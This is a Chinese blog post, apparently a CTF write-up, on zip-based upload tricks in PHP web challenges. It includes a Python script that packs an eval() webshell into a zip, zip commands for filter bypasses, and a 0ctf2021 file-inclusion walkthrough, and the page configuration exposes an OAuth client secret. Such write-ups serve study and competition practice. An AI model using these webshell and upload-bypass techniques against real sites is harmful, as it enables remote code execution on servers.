<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo_32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo_16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"twe1v3.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="这是一场招新赛中的一个赛题做的总结，大佬们锤轻点QwQ">
<meta property="og:type" content="article">
<meta property="og:title" content="CTF中zip文件的使用">
<meta property="og:url" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="TWe1v3">
<meta property="og:description" content="这是一场招新赛中的一个赛题做的总结，大佬们锤轻点QwQ">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106143638292.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106145439629.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106145936187.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/1.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106185559363.png">
<meta property="og:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106184440246.png">
<meta property="article:published_time" content="2022-10-22T16:43:13.000Z">
<meta property="article:modified_time" content="2022-11-06T11:27:43.783Z">
<meta property="article:author" content="TWe1v3">
<meta property="article:tag" content="技术总结">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106143638292.png">


<link rel="canonical" href="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":"","permalink":"http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/","path":"2022/10/CTF中zip文件的使用/","title":"CTF中zip文件的使用"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>CTF中zip文件的使用 | TWe1v3</title>
  





<script src="/lib/fireworks.js"></script>
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">TWe1v3</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于TWe1v3</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>文章标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>文章分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>时间轴</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">CTF中zip文件的使用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BFONE%E2%80%94zip%E6%8A%A5%E9%94%99%E8%A7%A3%E5%8E%8B"><span class="nav-number">1.1.</span> <span class="nav-text">利用姿势ONE—zip报错解压</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D-%E6%8A%A5%E9%94%99"><span class="nav-number">1.1.1.</span> <span class="nav-text">文件名&#x2F;报错</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B6%85%E9%95%BF%E6%96%87%E4%BB%B6%E5%90%8D%E6%8A%A5%E9%94%99%E4%BC%B4%E9%9A%8F%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="nav-number">1.1.2.</span> <span class="nav-text">超长文件名报错伴随一句话木马</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BFTwo%E2%80%93%E5%90%8C%E5%90%8D%E8%A7%A3%E5%8E%8B"><span class="nav-number">1.2.</span> <span class="nav-text">利用姿势Two–同名解压</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%8B%E7%BC%A9%E5%8C%85%E4%B8%AD%E7%9B%AE%E5%BD%95%E5%90%8D%E5%92%8C%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E5%90%8D%E7%9B%B8%E5%90%8C"><span class="nav-number">1.2.1.</span> <span class="nav-text">压缩包中目录名和一个文件名相同</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%9B%E5%BB%BA%E2%80%9C0%E2%80%9D%E6%96%87%E4%BB%B6%E5%A4%B9%E7%BB%95%E8%BF%87"><span class="nav-number">1.2.2.</span> <span class="nav-text">创建“0”文件夹绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BFThree%E2%80%93%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A"><span class="nav-number">1.3.</span> <span class="nav-text">利用姿势Three–目录穿越</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BD%AF%E8%BF%9E%E6%8E%A5"><span class="nav-number">1.3.1.</span> <span class="nav-text">软连接</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BFFour%E2%80%93%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.4.</span> <span class="nav-text">利用姿势Four–文件包含</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#inephp-0ctf2021"><span class="nav-number">1.5.</span> <span class="nav-text">inephp - 0ctf2021</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="TWe1v3"
      src="/images/twe1v3.gif">
  <p class="site-author-name" itemprop="name">TWe1v3</p>
  <div class="site-description" itemprop="description">TWe1v3的博客</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/TWe1v3" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;TWe1v3" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:twe1v3@qq.com" title="E-Mail → mailto:twe1v3@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.csdn.net/weixin_44450575" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_44450575" rel="noopener" target="_blank">sight's CSDN</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.coolcalo.top/" title="http:&#x2F;&#x2F;www.coolcalo.top&#x2F;" rel="noopener" target="_blank">coolcalo'blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.t0mrvvi1b3t.top/" title="http:&#x2F;&#x2F;www.t0mrvvi1b3t.top&#x2F;" rel="noopener" target="_blank">t0mr'blog</a>
        </li>
    </ul>
  </div>

        </div>
      </div>

    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://twe1v3.github.io/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/twe1v3.gif">
      <meta itemprop="name" content="TWe1v3">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TWe1v3">
      <meta itemprop="description" content="TWe1v3的博客">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="CTF中zip文件的使用 | TWe1v3">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CTF中zip文件的使用
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-10-23 00:43:13" itemprop="dateCreated datePublished" datetime="2022-10-23T00:43:13+08:00">2022-10-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-11-06 19:27:43" itemprop="dateModified" datetime="2022-11-06T19:27:43+08:00">2022-11-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB%E5%A4%8D%E7%8E%B0/" itemprop="url" rel="index"><span itemprop="name">技术分享复现</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2.3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>2 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>这是一场招新赛中的一个赛题做的总结，大佬们锤轻点QwQ</p>
<span id="more"></span>
<h1>CTF中zip文件的使用</h1>
<p>在CTF中zip文件的出现频率很高，大多出现在Misc和Crypto赛道以加密和修复的姿势出现，但本文主要讲解的是在Web赛道上zip文件的一下利用方式。</p>
<h2 id="利用姿势ONE—zip报错解压">利用姿势ONE—zip报错解压</h2>
<p>利用条件：只能上传压缩包，且压缩包内的图片会保留，其他都会删除，对目录穿越做了限制； 只能从解压方面入手。</p>
<h3 id="文件名-报错">文件名/报错</h3>
<p>在PHP架构中，有一个自带的解压函数ZipArchive。这里的报错解压就是使ZipArchive识别文件出错，但是能够正常保留压缩包中的文件。例如在windows下不允许文件中包含</p>
<p>冒号(:)，我们就可以在010editor中修改压缩文件的deFileName属性的值，此时解压就会出错，但是一句话代码就会保留下来。在Linux下也有类似的方法，可以将文件名改成5个斜杠(/////)，此时Linux写解压也会出错，但是一句话木马被保留下来了。</p>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106143638292.png" alt="image-20221106143638292"></p>
<h3 id="超长文件名报错伴随一句话木马">超长文件名报错伴随一句话木马</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"></span><br><span class="line">mf = io.BytesIO()</span><br><span class="line"><span class="keyword">with</span> zipfile.ZipFile(mf, mode=<span class="string">&quot;w&quot;</span>, compression=zipfile.ZIP_STORED) <span class="keyword">as</span> zf:</span><br><span class="line">    zf.writestr(<span class="string">&#x27;1.php&#x27;</span>, <span class="string">b&#x27;@&lt;?php eval($_POST[TW])?&gt;&#x27;</span>)</span><br><span class="line">    zf.writestr(<span class="string">&#x27;A&#x27;</span> * <span class="number">5000</span>, <span class="string">b&#x27;AAAAA&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;shell.zip&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(mf.getvalue())</span><br></pre></td></tr></table></figure>
<h2 id="利用姿势Two–同名解压">利用姿势Two–同名解压</h2>
<h3 id="压缩包中目录名和一个文件名相同">压缩包中目录名和一个文件名相同</h3>
<p>首先创建一个shell.php，内包含一句话木马，先把压缩进压缩包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zip -y test1.zip shell.php</span><br></pre></td></tr></table></figure>
<p>然后删除shell.php创建一个同名文件夹，里面随便放一些东西，再压缩进同一个压缩包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mkdir shell.php</span><br><span class="line">zip -y test1.zip shell.php/1.txt</span><br></pre></td></tr></table></figure>
<h3 id="创建“0”文件夹绕过">创建“0”文件夹绕过</h3>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106145439629.png" alt="image-20221106145439629"></p>
<p>这里的read()函数不会处理0文件夹，所以这里的array返回值为空。</p>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106145936187.png" alt="image-20221106145936187"></p>
<p>所以file_list得到的也是空值，在执行删除目录或者文件的时候便不会删除到0文件夹下的内容。</p>
<h2 id="利用姿势Three–目录穿越">利用姿势Three–目录穿越</h2>
<h3 id="软连接">软连接</h3>
<p>目前遇到的赛题MT-CTF初赛  ，由于没找到环境现在打一下，就着比赛时候的writeup说一下</p>
<p>先说一下软连接</p>
<blockquote>
<p>软连接是linux中一个常用命令，它的功能是为某一个文件在另外一个位置建立一个同步的链接。</p>
<p>具体用法是：ln -s 源文件 目标文件。</p>
<p>当 我们需要在不同的目录，用到相同的文件时，我们不需要在每一个需要的目录下都放一个必须相同的文件，我们只要在其它的 目录下用ln命令链接（link）就可以，不必重复的占用磁盘空间</p>
</blockquote>
<p><a href="..........%5C%E6%A1%8C%E9%9D%A2%5CCTF%5CMT_CTF%5CMT-CTF%E5%86%B3%E8%B5%9B-Writeup.pdf">MT-CTF决赛-Writeup.pdf</a></p>
<h2 id="利用姿势Four–文件包含">利用姿势Four–文件包含</h2>
<h2 id="inephp-0ctf2021">inephp - 0ctf2021</h2>
<p><a target="_blank" rel="noopener" href="https://github.com/waderwu/My-CTF-Challenges/tree/master/0ctf-2021/1linephp">这个题目</a>取自非常经典的文件包含题。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">(<span class="variable">$_</span>=@<span class="variable">$_GET</span>[<span class="string">&#x27;yxxx&#x27;</span>].<span class="string">&#x27;.php&#x27;</span>) &amp;&amp; @<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">file</span>(<span class="variable">$_</span>)[<span class="number">0</span>],<span class="number">0</span>,<span class="number">6</span>) === <span class="string">&#x27;@&lt;?php&#x27;</span> ? <span class="keyword">include</span>(<span class="variable">$_</span>) : <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>) &amp;&amp; <span class="keyword">include</span>(<span class="string">&#x27;phpinfo.html&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>这里限制后缀必须是<code>.php</code>的文件才能够实现包含。这里可以利用zip来构成条件竞争来上传。</p>
<p>这里需要传一个构造过的zip包，然后令<code>yxxx=zip:///tmp/sess_evil#1</code>这样，让后续的代码能够include它。但显然通过<em>session.upload_progress</em>搞上去的文件最开始的字符串内容是<code>upload_progress_</code>，所以必须想办法绕过<code>@substr(file($_)[0],0,6) === '@&lt;?php'</code>的判断。</p>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/1.png" alt="1.png"></p>
<p>根据<a target="_blank" rel="noopener" href="https://github.com/corkami/collisions#zip">上图</a>，我们不难发现<code>End of Central Directory</code>(中央目录结束)里面有一个<code>offset of start of central</code>(中心起点的偏移量)，左下的示意图说明程序处理zip文件的时候首先从这个文件末尾出发，根据偏移找到Central Directory<code>(中央目录)的头位置，然后再根据</code>relative offset of local header<code>(本地头的相对偏移量)找到整个zip文件头的位置，也就指向</code>local file header signature`(本地文件头签名)</p>
<p><strong>zip构造</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">zip shell.zip 1.php</span><br><span class="line">echo -n &quot;upload_progress_&quot; &gt; f</span><br><span class="line">cat f shell.zip &gt; b.zip</span><br><span class="line">zip -F b.zip --out c.zip</span><br></pre></td></tr></table></figure>
<p>这里的解决办法就是修改这两个offset，这样zip协议能够跳开前面几个字符找到正确的位置。另外，CRC的值我们也不必进行修改，因为<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/63647618/how-to-validate-crc-32-calculation-of-zip-file">这里的crc-32其实是根据crc前面的相关信息计算出来的结果</a>。因为最开始的字符串内容是<code>upload_progress_</code>，其长度为16，因此这两个offset（从010editor来看就是<code>elDirectoryOffset</code>(el目录偏移量)和<code>deHeaderOffset</code>(de标头偏移量)）都要加上16。</p>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106185559363.png" alt="image-20221106185559363"></p>
<p><img src="/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/image-20221106184440246.png" alt="image-20221106184440246"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%8A%80%E6%9C%AF%E6%80%BB%E7%BB%93/" rel="tag"># 技术总结</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/09/MT-CTF-Writeup/" rel="prev" title="MT-CTF-Writeup">
                  <i class="fa fa-chevron-left"></i> MT-CTF-Writeup
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/11/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="next" title="PHP反序列化">
                  PHP反序列化 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">TWe1v3</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">179k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:43</span>
  </span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

    </div>
  </footer>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/9.1.3/mermaid.min.js","integrity":"sha256-TIYL00Rhw/8WaoUhYTLX9SKIEFdXxg+yMWSLVUbhiLg="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>



  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/katex.min.css" integrity="sha256-uik/hNqHWZldXh/0K35nqOSCff9F61/ZOFReqNOBgB0=" crossorigin="anonymous">
  <script class="next-config" data-name="katex" type="application/json">{"copy_tex_js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/contrib/copy-tex.min.js","integrity":"sha256-Us54+rSGDSTvIhKKUs4kygE2ipA0RXpWWh0/zLqw3bs="}}</script>
  <script src="/js/third-party/math/katex.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"TWe1v3# GitHub repo owner","repo":"TWe1v3-Blogcomment","client_id":"b1f12cb0fd210a7f001b# GitHub Application Client ID","client_secret":"80355aa1b174d1926079780262cdc80f1ca96516","admin_user":"TWe1v3","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"zh-CN","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"40fdb827a1be82002d50ce93ba6f3847"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>


<script src="/live2d-widget/autoload.js"></script>
</body>
</html>
